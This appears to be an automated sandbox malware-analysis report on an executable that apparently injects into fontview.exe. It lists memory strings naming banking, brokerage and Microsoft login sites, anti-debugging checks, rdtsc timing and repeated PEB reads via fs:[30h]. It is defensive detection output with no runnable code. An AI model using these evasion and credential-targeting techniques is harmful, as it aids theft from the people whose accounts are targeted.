Source: FyF7rO8j-P.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: mErdTxurOiTQQ.exe, 0000000D.00000002.3126223535.000000000128F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: FyF7rO8j-P.12.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: FyF7rO8j-P.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: FyF7rO8j-P.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: fontview.exe, 0000000C.00000002.3130931716.0000000007712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PasswordVMware20,11696492231^
Source: FyF7rO8j-P.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: FyF7rO8j-P.12.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 0000000F.00000002.1960911040.0000026D4A08C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: FyF7rO8j-P.12.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: fontview.exe, 0000000C.00000002.3130931716.0000000007712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,116964r
Source: FyF7rO8j-P.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: FyF7rO8j-P.12.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: FyF7rO8j-P.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: FyF7rO8j-P.12.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: FyF7rO8j-P.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: FyF7rO8j-P.12.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: FyF7rO8j-P.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: FyF7rO8j-P.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: fontview.exe, 0000000C.00000002.3123858472.000000000044B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(%
Source: FyF7rO8j-P.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: FyF7rO8j-P.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: FyF7rO8j-P.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: FyF7rO8j-P.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: FyF7rO8j-P.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Code function: 10_2_013E096E rdtsc

10_2_013E096E

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Code function: 10_2_00417863 LdrLoadDll,

10_2_00417863

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01434144 mov eax, dword ptr fs:[00000030h]	10_2_01434144
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01434144 mov eax, dword ptr fs:[00000030h]	10_2_01434144
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01434144 mov ecx, dword ptr fs:[00000030h]	10_2_01434144
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01434144 mov eax, dword ptr fs:[00000030h]	10_2_01434144
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01434144 mov eax, dword ptr fs:[00000030h]	10_2_01434144
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D0124 mov eax, dword ptr fs:[00000030h]	10_2_013D0124
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01438158 mov eax, dword ptr fs:[00000030h]	10_2_01438158
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474164 mov eax, dword ptr fs:[00000030h]	10_2_01474164
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474164 mov eax, dword ptr fs:[00000030h]	10_2_01474164
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov eax, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov ecx, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov eax, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov eax, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov ecx, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov eax, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov eax, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov ecx, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov eax, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E10E mov ecx, dword ptr fs:[00000030h]	10_2_0144E10E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01460115 mov eax, dword ptr fs:[00000030h]	10_2_01460115
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144A118 mov ecx, dword ptr fs:[00000030h]	10_2_0144A118
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144A118 mov eax, dword ptr fs:[00000030h]	10_2_0144A118
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144A118 mov eax, dword ptr fs:[00000030h]	10_2_0144A118
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144A118 mov eax, dword ptr fs:[00000030h]	10_2_0144A118
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6154 mov eax, dword ptr fs:[00000030h]	10_2_013A6154
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6154 mov eax, dword ptr fs:[00000030h]	10_2_013A6154
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139C156 mov eax, dword ptr fs:[00000030h]	10_2_0139C156
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014661C3 mov eax, dword ptr fs:[00000030h]	10_2_014661C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014661C3 mov eax, dword ptr fs:[00000030h]	10_2_014661C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0141E1D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0141E1D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0141E1D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0141E1D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0141E1D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014761E5 mov eax, dword ptr fs:[00000030h]	10_2_014761E5
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139A197 mov eax, dword ptr fs:[00000030h]	10_2_0139A197
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139A197 mov eax, dword ptr fs:[00000030h]	10_2_0139A197
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139A197 mov eax, dword ptr fs:[00000030h]	10_2_0139A197
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E0185 mov eax, dword ptr fs:[00000030h]	10_2_013E0185
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01444180 mov eax, dword ptr fs:[00000030h]	10_2_01444180
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01444180 mov eax, dword ptr fs:[00000030h]	10_2_01444180
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D01F8 mov eax, dword ptr fs:[00000030h]	10_2_013D01F8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145C188 mov eax, dword ptr fs:[00000030h]	10_2_0145C188
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145C188 mov eax, dword ptr fs:[00000030h]	10_2_0145C188
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142019F mov eax, dword ptr fs:[00000030h]	10_2_0142019F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142019F mov eax, dword ptr fs:[00000030h]	10_2_0142019F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142019F mov eax, dword ptr fs:[00000030h]	10_2_0142019F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142019F mov eax, dword ptr fs:[00000030h]	10_2_0142019F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426050 mov eax, dword ptr fs:[00000030h]	10_2_01426050
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139A020 mov eax, dword ptr fs:[00000030h]	10_2_0139A020
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139C020 mov eax, dword ptr fs:[00000030h]	10_2_0139C020
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE016 mov eax, dword ptr fs:[00000030h]	10_2_013BE016
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE016 mov eax, dword ptr fs:[00000030h]	10_2_013BE016
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE016 mov eax, dword ptr fs:[00000030h]	10_2_013BE016
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE016 mov eax, dword ptr fs:[00000030h]	10_2_013BE016
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01424000 mov ecx, dword ptr fs:[00000030h]	10_2_01424000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000 mov eax, dword ptr fs:[00000030h]	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CC073 mov eax, dword ptr fs:[00000030h]	10_2_013CC073
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A2050 mov eax, dword ptr fs:[00000030h]	10_2_013A2050
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01436030 mov eax, dword ptr fs:[00000030h]	10_2_01436030
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013980A0 mov eax, dword ptr fs:[00000030h]	10_2_013980A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014220DE mov eax, dword ptr fs:[00000030h]	10_2_014220DE
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014260E0 mov eax, dword ptr fs:[00000030h]	10_2_014260E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A208A mov eax, dword ptr fs:[00000030h]	10_2_013A208A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139C0F0 mov eax, dword ptr fs:[00000030h]	10_2_0139C0F0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E20F0 mov ecx, dword ptr fs:[00000030h]	10_2_013E20F0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A80E9 mov eax, dword ptr fs:[00000030h]	10_2_013A80E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139A0E3 mov ecx, dword ptr fs:[00000030h]	10_2_0139A0E3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014380A8 mov eax, dword ptr fs:[00000030h]	10_2_014380A8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014660B8 mov eax, dword ptr fs:[00000030h]	10_2_014660B8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014660B8 mov ecx, dword ptr fs:[00000030h]	10_2_014660B8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0147634F mov eax, dword ptr fs:[00000030h]	10_2_0147634F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01422349 mov eax, dword ptr fs:[00000030h]	10_2_01422349
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146A352 mov eax, dword ptr fs:[00000030h]	10_2_0146A352
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01448350 mov ecx, dword ptr fs:[00000030h]	10_2_01448350
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142035C mov eax, dword ptr fs:[00000030h]	10_2_0142035C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142035C mov eax, dword ptr fs:[00000030h]	10_2_0142035C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142035C mov eax, dword ptr fs:[00000030h]	10_2_0142035C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142035C mov ecx, dword ptr fs:[00000030h]	10_2_0142035C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142035C mov eax, dword ptr fs:[00000030h]	10_2_0142035C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142035C mov eax, dword ptr fs:[00000030h]	10_2_0142035C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139C310 mov ecx, dword ptr fs:[00000030h]	10_2_0139C310
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C0310 mov ecx, dword ptr fs:[00000030h]	10_2_013C0310
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA30B mov eax, dword ptr fs:[00000030h]	10_2_013DA30B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA30B mov eax, dword ptr fs:[00000030h]	10_2_013DA30B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA30B mov eax, dword ptr fs:[00000030h]	10_2_013DA30B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144437C mov eax, dword ptr fs:[00000030h]	10_2_0144437C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01478324 mov eax, dword ptr fs:[00000030h]	10_2_01478324
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01478324 mov ecx, dword ptr fs:[00000030h]	10_2_01478324
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01478324 mov eax, dword ptr fs:[00000030h]	10_2_01478324
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01478324 mov eax, dword ptr fs:[00000030h]	10_2_01478324
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014263C0 mov eax, dword ptr fs:[00000030h]	10_2_014263C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145C3CD mov eax, dword ptr fs:[00000030h]	10_2_0145C3CD
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014443D4 mov eax, dword ptr fs:[00000030h]	10_2_014443D4
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014443D4 mov eax, dword ptr fs:[00000030h]	10_2_014443D4
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E3DB mov eax, dword ptr fs:[00000030h]	10_2_0144E3DB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E3DB mov eax, dword ptr fs:[00000030h]	10_2_0144E3DB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E3DB mov ecx, dword ptr fs:[00000030h]	10_2_0144E3DB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144E3DB mov eax, dword ptr fs:[00000030h]	10_2_0144E3DB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01398397 mov eax, dword ptr fs:[00000030h]	10_2_01398397
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01398397 mov eax, dword ptr fs:[00000030h]	10_2_01398397
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01398397 mov eax, dword ptr fs:[00000030h]	10_2_01398397
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139E388 mov eax, dword ptr fs:[00000030h]	10_2_0139E388
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139E388 mov eax, dword ptr fs:[00000030h]	10_2_0139E388
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139E388 mov eax, dword ptr fs:[00000030h]	10_2_0139E388
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C438F mov eax, dword ptr fs:[00000030h]	10_2_013C438F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C438F mov eax, dword ptr fs:[00000030h]	10_2_013C438F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D63FF mov eax, dword ptr fs:[00000030h]	10_2_013D63FF
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE3F0 mov eax, dword ptr fs:[00000030h]	10_2_013BE3F0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE3F0 mov eax, dword ptr fs:[00000030h]	10_2_013BE3F0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE3F0 mov eax, dword ptr fs:[00000030h]	10_2_013BE3F0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B03E9 mov eax, dword ptr fs:[00000030h]	10_2_013B03E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA3C0 mov eax, dword ptr fs:[00000030h]	10_2_013AA3C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA3C0 mov eax, dword ptr fs:[00000030h]	10_2_013AA3C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA3C0 mov eax, dword ptr fs:[00000030h]	10_2_013AA3C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA3C0 mov eax, dword ptr fs:[00000030h]	10_2_013AA3C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA3C0 mov eax, dword ptr fs:[00000030h]	10_2_013AA3C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA3C0 mov eax, dword ptr fs:[00000030h]	10_2_013AA3C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A83C0 mov eax, dword ptr fs:[00000030h]	10_2_013A83C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A83C0 mov eax, dword ptr fs:[00000030h]	10_2_013A83C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A83C0 mov eax, dword ptr fs:[00000030h]	10_2_013A83C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A83C0 mov eax, dword ptr fs:[00000030h]	10_2_013A83C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01428243 mov eax, dword ptr fs:[00000030h]	10_2_01428243
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01428243 mov ecx, dword ptr fs:[00000030h]	10_2_01428243
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139823B mov eax, dword ptr fs:[00000030h]	10_2_0139823B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145A250 mov eax, dword ptr fs:[00000030h]	10_2_0145A250
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145A250 mov eax, dword ptr fs:[00000030h]	10_2_0145A250
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0147625D mov eax, dword ptr fs:[00000030h]	10_2_0147625D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274 mov eax, dword ptr fs:[00000030h]	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139826B mov eax, dword ptr fs:[00000030h]	10_2_0139826B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A4260 mov eax, dword ptr fs:[00000030h]	10_2_013A4260
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A4260 mov eax, dword ptr fs:[00000030h]	10_2_013A4260
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A4260 mov eax, dword ptr fs:[00000030h]	10_2_013A4260
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A6259 mov eax, dword ptr fs:[00000030h]	10_2_013A6259
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139A250 mov eax, dword ptr fs:[00000030h]	10_2_0139A250
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014762D6 mov eax, dword ptr fs:[00000030h]	10_2_014762D6
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B02A0 mov eax, dword ptr fs:[00000030h]	10_2_013B02A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B02A0 mov eax, dword ptr fs:[00000030h]	10_2_013B02A0
